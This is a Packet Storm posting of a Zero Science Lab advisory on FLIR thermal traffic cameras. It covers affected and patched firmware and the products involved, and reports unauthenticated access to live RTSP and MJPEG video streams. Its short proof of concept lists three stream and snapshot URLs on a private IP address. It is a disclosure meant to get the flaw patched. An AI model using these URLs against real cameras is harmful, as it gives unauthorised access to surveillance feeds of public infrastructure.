what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure

FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure
Posted Oct 8, 2018
Authored by LiquidWorm | Site zeroscience.mk

FLIR Systems FLIR thermal traffic cameras suffer from an RTSP stream disclosure vulnerability.

tags | exploit
SHA-256 | f65f2f6d488c81f677bcd9bbadf582687ea5b1b17b888d215e2c7c4ce7ea981a

FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure

Change Mirror Download

FLIR Systems FLIR Thermal Traffic Cameras RTSP Stream Disclosure


Vendor: FLIR Systems, Inc.
Product web page: https://www.flir.com

Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne
E1.00.09 (TI BPL2 EDGE) Codename: TIIP4EDGE
V1.02.P01 (TI x-stream) Codename: TIIP2
V1.05.P01 (ThermiCam) Codename: ThermiCam
V1.04.P02 (ThermiCam) Codename: ThermiCam
V1.04 (ThermiCam) Codename: ThermiCam
V1.01.P02 (ThermiCam) Codename: ThermiCam
V1.05.P03 (TrafiSense) Codename: TrafiSense
V1.06 (VIP-IP) Codename: VIP-IP
V1.02.P02 (TrafiRadar) Codename: TrafiRadar

Vendor patched firmware version:

Product name Firmware Released
----------------------------------------------------
ThermiCam / TrafiSense E1.06.03 17.09.2018
TI BPL2 EDGE V1.00 17.09.2018
TI x-stream E1.03.02 17.09.2018
TrafiOne E1.02.02 17.09.2018
----------------------------------------------------

Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
and dynamic traffic signal control. Offered in a compact and affordable
package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
adapt traffic signals based on the presence detection of vehicles, bicycles
and pedestrians while at the same time generating high resolution data at
intersections and in urban environments. FLIR TrafiOne helps traffic engineers
to improve traffic flows, reduce vehicle idling time, monitor congestion,
enhance safety for vulnerable road users, collect data and measure travel and
delay times for different transport modes.

FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
video detector in a single unit. FLIR TrafiCam detects moving and stationary
vehicles at signalized intersections. Via detection outputs or via IP protocol,
vehicle presence information is transmitted to the traffic controller so that
signal timing can be adjusted dynamically. This way, vehicle waiting time at
traffic lights is reduced and traffic flows are optimized.

FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
detection. TrafiSense does not need light to operate, but uses the thermal energy
emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
and bikes in the darkest of nights, over a long range and in the most difficult
weather conditions. The result is reliable, 24/7 traffic detection for a wide
range of applications.

FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
radar. TrafiRadar is typically used for stop bar and advance vehicle presence
detection, traffic adaptive systems, and dilemma-zone protection and thus improves
traffic safety and efficiency at signalized intersections. TrafiRadar will warn
traffic light controllers whenever a vehicle is present in the dilemma zone, either
extending green or red lights to improve overall safety.and stationary vehicles at
signalized intersections and collect traffic data at intersections or interurban
roads. Via detection outputs or via IP protocol, vehicle presence information is
transmitted to the traffic controller so that signal timing can be adjusted
dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
used for traffic monitoring in a control room.

The VIP series offers multi-functional Video Image Processing modules for traffic
control. VIP boards integrate automatic incident detection, data collection,
recording of pre and post incident image sequences and streaming video in one
board. VIP modules have been installed for road and tunnel projects all over the
world.

Desc: FLIR thermal traffic cameras suffer from an unauthenticated and unauthorized
live RTSP video stream access.

Tested on: nginx/1.12.1
nginx/1.10.2
nginx/1.8.0
Websocket/13 (RFC 6455)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - https://www.zeroscience.mk


Advisory ID: ZSL-2018-5489
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php

Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf


01.08.2018

--


PoC:

1. http://192.168.1.1/live.mjpeg?id=1
2. rtsp://192.168.1.1/mpeg4
3. http://192.168.1.1/snapshot.jpg
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close